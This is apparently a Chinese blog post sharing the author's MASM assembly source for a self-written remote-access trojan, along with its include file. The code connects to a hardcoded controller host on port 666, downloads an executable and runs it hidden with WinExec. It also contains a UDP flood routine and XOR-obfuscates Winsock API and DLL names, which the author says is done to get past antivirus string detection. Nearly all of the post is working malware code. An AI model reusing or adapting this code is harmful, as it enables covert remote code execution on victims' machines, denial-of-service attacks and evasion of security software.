最先是在看雪发的 新开空间我也没啥东西 只能拿这个凑数了
;作者:落笔飞花笑百生
;日期:2014/12/20
;用处:练手
;写一个程序虽然很烂但是确实能学到很多,用汇编写程序能逼迫自己去学习以前高级语言中容易忽略的东西虽然还是不够。
;但是至少脱离了只能用别人封装好的库来写程序的恶性循环
;这个程序也没有了写下去的意思,该解决的都解决了我实在想不出来再写他具体能得到什么
;本来想把自己实现的getFUNCaddress加进去的,也没有这样做。
;DLL名称和函数名称由于直接这样写会被某些弱智杀软杀字符串没办法只能xor简单加密一下然后取地址再动态解密一下 这样过了表面
;二次开发的人注意:xor第一个字符不加密的
include androidprotect.inc
.code
dipx byte "192.168.0.101",0
;dipx byte "anyou5.com",0
ganraoz proc
ret
ganraoz endp
_CalcCheckSum proc _lpsz,_dwSize
local @dwSize
pushad
mov ecx,_dwSize
shr ecx,1
xor ebx,ebx
mov esi,_lpsz
;********************************************************************
; 数据包校验和为每 16 位累加
;********************************************************************
cld
@@:
lodsw
movzx eax,ax
add ebx,eax
loop @B
;********************************************************************
; 最后如果有单 8 位则继续累加
;********************************************************************
test _dwSize,1
jz @F
lodsb
movzx eax,al
add ebx,eax
@@:
;********************************************************************
; 将高 16 位并入低 16 位后取反输出
;********************************************************************
mov eax,ebx
and eax,0ffffh
shr ebx,16
add eax,ebx
not ax
mov @dwSize,eax
popad
mov eax,@dwSize
ret
_CalcCheckSum endp
udpattack proc
invoke m_socket,AF_INET, SOCK_DGRAM, 17
mov udpsock,eax
mov udpSin.sin_family, AF_INET
invoke gethtons,udpport
mov udpSin.sin_port,ax
invoke m_gethostbyname,offset udpip
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
invoke m_inet_ntoa,eax
invoke m_inet_addr,eax
mov udpSin.sin_addr.S_un.S_addr,eax
invoke m_setsockopt,udpsock,SOL_SOCKET,SO_SNDBUF,offset udpbuf,sizeof udpbuf
.while byte ptr [uptrue]==1
invoke GetTickCount
invoke dwtoa,eax,offset udpbuff
invoke lstrlen,offset udpbuff
invoke m_sendto,udpsock,offset udpbuff,eax,0,offset udpSin,sizeof udpSin
.endw
invoke m_closesocket,udpsock
ret
udpattack endp
stringtodw proc string:dword,strsiz:dword
;日期:2014/12/23
;用处:字符串数字无差转换成DWORD
;作者:落笔飞花笑百生
xor eax,eax
mov edi,string
xor ebx ,ebx
xor esi,esi
mov ecx,strsiz
fuckmm:
MOVZX ESI,BYTE PTR DS:[EDI]
cmp esi,0
je close
LEA EAX,DWORD PTR DS:[EBX+EBX*4]
LEA EBX,DWORD PTR DS:[ESI+EAX*2-30h]
INC EDI
loop fuckmm
close:
mov eax,ebx
ret 8
stringtodw endp
xorstring proc dstring,dsize:dword
;解密字符串
mov eax,dstring
mov ecx,dsize
@@:
inc eax
xor byte ptr [eax],5
loop @B
ret
xorstring endp
gethtons proc port :dword
;转换端口
mov eax,dword ptr ss:[ebp+8]
movzx ecx,ax
movzx eax,cl
shl eax,8
shr ecx ,8
or eax,ecx
ret
gethtons endp
midstr proc a,b,cc,d:dword
;截取字符串
push esi
push edi
xor eax,eax
xor ebx,ebx
mov eax,d
mov ebx,cc
sub eax,ebx
mov ecx,eax
cld
mov esi,a
add esi ,cc
mov edi,b
rep movsb
pop esi
pop edi
ret
midstr endp
ganraoy proc
ret
ganraoy endp
start proc
;入口
invoke GetCommandLine
call $+5
call $+5
call $+5
jmp xaxa
xaxa:
call getproaddress
invoke m_WSAStartup,0202h,offset WSAData
.repeat
invoke m_socket,AF_INET, SOCK_STREAM, IPPROTO_TCP
.if eax!=INVALID_SOCKET
mov hSock,eax
mov Sin.sin_family, AF_INET
invoke gethtons,dport
mov Sin.sin_port,ax
invoke m_gethostbyname,offset dipx
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
invoke m_inet_ntoa,eax
invoke m_inet_addr,eax
mov Sin.sin_addr.S_un.S_addr,eax
invoke m_connect,hSock,addr Sin,sizeof Sin
.endif
recvloop:
invoke RtlZeroMemory,offset flag,sizeof flag
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke m_recv,hSock,offset recvbuff,sizeof recvbuff,0
.while eax>0 &&eax!=INVALID_SOCKET &&eax!=SOCKET_ERROR
invoke midstr,offset recvbuff,offset flag,0,2
invoke lstrcmpi,offset flag,offset xz
cmp eax,0
je xxz
invoke midstr,offset recvbuff,offset flag,0,2
invoke lstrcmpi,offset flag,offset pe
cmp eax,0
je fuckfile
jmp recvloop
;写出PE文件
fuckfile:
invoke GetCurrentDirectory,260,offset currd
invoke GetTickCount
invoke dwtoa,eax,offset filename
invoke lstrcat ,offset filename,$CTA0(".exe")
invoke lstrcat,offset currd,offset xiegang
invoke lstrcat,offset currd,offset filename
;处理要写出的文件名字和路径
invoke DeleteFile,offset currd
;会以MZ开头的
invoke CreateFile,addr currd,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
mov hfilehandle,eax
invoke WriteFile,hfilehandle,offset recvbuff,sizeof recvbuff,offset oldwritebytes,NULL
loopwrite:
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke m_recv,hSock,offset recvbuff,sizeof recvbuff,0
invoke SetFilePointer,hfilehandle,NULL,NULL,FILE_END
invoke WriteFile,hfilehandle,offset recvbuff,sizeof recvbuff,offset oldwritebytes,NULL
invoke GetFileSize,hfilehandle,NULL
mov writebytes,eax
cmp eax,dword ptr [dFileSize]
je close
jmp loopwrite
close:
invoke CloseHandle,hfilehandle
mov dword ptr [dFileSize],0;大小清空
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke WinExec,offset currd,SW_HIDE;传输完毕后执行!
invoke m_send,hSock,offset filecs,sizeof filecs,0
jmp recvloop;
xxz:
invoke lstrlen,offset recvbuff
invoke midstr,offset recvbuff,offset dFileSize,2,eax
invoke lstrlen,offset dFileSize
invoke stringtodw,offset dFileSize,eax
mov dword ptr [dFileSize],eax
invoke m_send,hSock,offset getpe,sizeof getpe,0
jmp recvloop
.endw
invoke m_closesocket,hSock
invoke Sleep,10000
.until CLOSE==TRUE
invoke m_WSACleanup
start endp
winmain proc
invoke CreateThread,NULL,NULL,offset start,NULL,0,NULL;开启小马线程
ret
winmain endp
dwtoa proc dwValue:DWORD, lpBuffer:DWORD
;整数转换为字符串
nop
nop
nop
nop
nop
nop
nop
nop
push ebx
push esi
push edi
mov eax, dwValue
mov edi, [lpBuffer]
or eax,eax
jnz sign
zero:
mov word ptr [edi],30h
jmp dw2asc
sign:
jns pos
mov byte ptr [edi],'-'
neg eax
inc edi
pos:
mov ecx,429496730
mov esi, edi
.while (eax > 0)
mov ebx,eax
mul ecx
mov eax,edx
lea edx,[edx*4+edx]
add edx,edx
sub ebx,edx
add bl,'0'
mov [edi],bl
inc edi
.endw
mov byte ptr [edi], 0 ; terminate the string
; We now have all the digits, but in reverse order.
.while (esi < edi)
dec edi
mov al, [esi]
mov ah, [edi]
mov [edi], al
mov [esi], ah
inc esi
.endw
dw2asc:
pop edi
pop esi
pop ebx
ret
dwtoa endp
ganraox proc
push eax
push eax
pop eax
pop eax
mov eax,eax
ret
ganraox endp
ganraoxx proc
push eax
push eax
pop eax
pop eax
mov eax,eax
ret
ganraoxx endp
getproaddress proc
;获取API地址
invoke xorstring,offset ws32dll,sizeof ws32dll
invoke xorstring,offset wstp,sizeof wstp
invoke xorstring,offset sock,sizeof sock
invoke xorstring,offset getby,sizeof getby
invoke xorstring,offset inoa,sizeof inoa
invoke xorstring,offset inaddr,sizeof inaddr
invoke xorstring,offset cont,sizeof cont
invoke xorstring,offset recvx,sizeof recvx
invoke xorstring,offset colses,sizeof colses
invoke xorstring,offset wcl,sizeof wcl
invoke xorstring,offset sed,sizeof sed
invoke xorstring,offset sot,sizeof sot
invoke xorstring,offset sendtot,sizeof sendtot
;上面的CALL是解密字符串
invoke CreateMutex,NULL,NULL,$TA0("bixanhuxakai")
mov mxhand,eax
invoke GetLastError
.if eax== ERROR_ALREADY_EXISTS
invoke CloseHandle,offset mxhand
mov mxhand,0
invoke ExitProcess,NULL
.endif
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset wstp
mov m_WSAStartup,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sock
mov m_socket,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset getby
mov m_gethostbyname,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset inoa
mov m_inet_ntoa,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset inaddr
mov m_inet_addr,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset cont
mov m_connect,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset recvx
mov m_recv,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset colses
mov m_closesocket,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset wcl
mov m_WSACleanup,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sed
mov m_send,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sendtot
mov m_sendto,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sot
mov m_setsockopt,eax
ret
getproaddress endp
ganrao proc
ret
ganrao endp
end winmain
下面是INC文件
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include C:Users巫师DesktopRadASMmasm32macrosStrings.mac
_WSAStartup2 typedef proto :dword,:dword
_WSAStartup typedef ptr _WSAStartup2
_socket2 typedef proto :dword,:dword,:dword
_socket typedef ptr _socket2
_gethostbyname2 typedef proto :dword
_gethostbyname typedef ptr _gethostbyname2
_inet_ntoa2 typedef proto :dword
_inet_ntoa typedef ptr _inet_ntoa2
_inet_addr2 typedef proto :dword
_inet_addr typedef ptr _inet_addr2
_connect2 typedef proto :dword,:dword,:dword
_connect typedef ptr _connect2
_recv2 typedef proto :dword,:dword,:dword,:dword
_recv typedef ptr _recv2
_closesocket2 typedef proto :dword
_closesocket typedef ptr _closesocket2
_WSACleanup2 typedef proto
_WSACleanup typedef ptr _WSACleanup2
_send2 typedef proto :dword,:dword,:dword,:dword
_send typedef ptr _send2
_sendto2 typedef proto :dword,:dword,:dword,:dword,:dword,:dword
_sendto typedef ptr _sendto2
_setsockopt2 typedef proto :dword,:dword,:dword,:dword,:dword
_setsockopt typedef ptr _setsockopt2
getproaddress proto
dwtoa proto :dword,:dword
gethtons proto:dword
.data?
currd byte 260 dup (?)
filename byte 50 dup (?)
ipsize byte 50 dup (?)
recvbuff byte 1024 dup (?);1kb的缓存
Sin sockaddr_in <>
;UDP
udpSin sockaddr_in <>
udpbuff byte 200 dup(?)
udpbuf dd 00
udpport dd 00
udpip byte 50 dup (?)
udpsock dd 00
uptrue byte 01h
;UDP
WSAData WSADATA <>
m_WSAStartup _WSAStartup ?
m_socket _socket ?
m_gethostbyname _gethostbyname ?
m_inet_addr _inet_addr ?
m_inet_ntoa _inet_ntoa ?
m_connect _connect ?
m_recv _recv ?
m_closesocket _closesocket ?
m_WSACleanup _WSACleanup ?
m_send _send ?
m_setsockopt _setsockopt ?
m_sendto _sendto ?
.data
hfilehandle dd 00
writebytes dd 00
oldwritebytes dd 00
dFileSize dd 00
mxhand dd 00
xz byte "XZ",0
pe byte "MZ",0
flag byte 5 dup (?)
dport dword 666
CLOSE BOOL FALSE
filecs byte "FILECSWB!",0
getpe byte "GETPE!",0
xiegang byte "",0
hSock dd 00
datalengh dd 00
ws32dll byte 077h, 076h, 037h, 05Ah, 036h, 037h, 02Bh, 061h, 069h, 069h, 0005h
xa byte 00,00
wstp byte 0057h ,0056h ,0044h ,0056h ,0071h, 0064h ,0077h ,0071h ,0070h ,0075h ,0005h
xb byte 00,00
sock byte 073h ,06Ah ,066h ,06Eh ,060h ,0071h ,005h
xc byte 00,00
getby byte 0067h ,0060h ,0071h ,006Dh ,006Ah ,0076h ,0071h ,0067h ,007Ch ,006Bh ,0064h ,068h ,060h ,005h
xd byte 00,00
inoa byte 0069h ,006Bh ,0060h ,0071h ,005Ah ,006Bh ,0071h ,006Ah ,0064h ,005h
xe byte 00,00
inaddr byte 0069h, 006Bh, 0060h ,0071h, 005Ah, 0064h ,0061h, 0061h, 0077h, 0005h
xf byte 00,00
cont byte 0063h ,006Ah ,006Bh ,006Bh, 0060h, 0066h, 0071h ,0005h
xg byte 00,00
recvx byte 0072h ,0060h ,0066h ,0073h ,0005h
xh byte 00,00
colses byte 0063h ,0069h ,006Ah ,0076h ,0060h ,0076h, 006Ah, 0066h ,006Eh ,0060h ,0071h ,0005h
xi byte 00,00
wcl byte 0057h, 0056h ,0044h, 0046h, 0069h ,060h ,0064h ,006Bh ,0070h ,0075h ,0005h
xj byte 00,00
sed byte 0073h, 0060h, 006Bh, 0061h, 0005h
xk byte 00,00
sot byte 073h,060h,071h,076h,06Ah,066h,06Eh,06Ah,075h,071h,005h
xl byte 00,00
sendtot byte 073h,060h,06Bh,061h,071h,06Ah,005h
xm byte 00,00
分类
自己前几天用MASM写的一个远控
由FAKE
Subscribe
0 评论